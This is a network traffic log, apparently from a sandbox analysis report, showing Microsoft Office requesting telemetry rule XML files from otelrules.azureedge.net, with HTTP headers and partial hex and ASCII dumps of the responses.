                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 96cf3c30-101e-008d-3e69-3592e5000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-1749fc9bdbdjznvchC1DFWx4dc00000002c000000000ndhr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        75192.168.2.54978413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2170b64b-701e-001e-68a1-34f5e6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-r178fb8d7652w4wkhC1DFW0d7w00000002mg0000000099qs
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        76192.168.2.54978513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-16547b76f7f76p6chC1DFWctqw0000000ku000000000f7dc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        77192.168.2.54978613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:34 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142534Z-16547b76f7fj897nhC1DFWdwq40000000kfg00000000p79d
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        78192.168.2.54978713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:34 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 11343522-e01e-0085-0240-36c311000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142534Z-16547b76f7f7scqbhC1DFW0m5w0000000kmg00000000c4h7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        79192.168.2.54978913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:34 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: f6eefceb-a01e-001e-33a0-3449ef000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142534Z-r178fb8d765jv86hhC1DFW8pt000000002q0000000008d5x
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        80192.168.2.54979013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:34 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:34 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 87e60a3d-901e-0067-3833-36b5cb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142534Z-1749fc9bdbdcm45lhC1DFWeab800000002eg00000000dykw
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        81192.168.2.54979113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: a14a0ed7-201e-0096-78aa-31ace6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-16547b76f7fj897nhC1DFWdwq40000000kng000000009atg
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        82192.168.2.54979313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-16547b76f7f7rtshhC1DFWrtqn0000000kw0000000003m4c
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
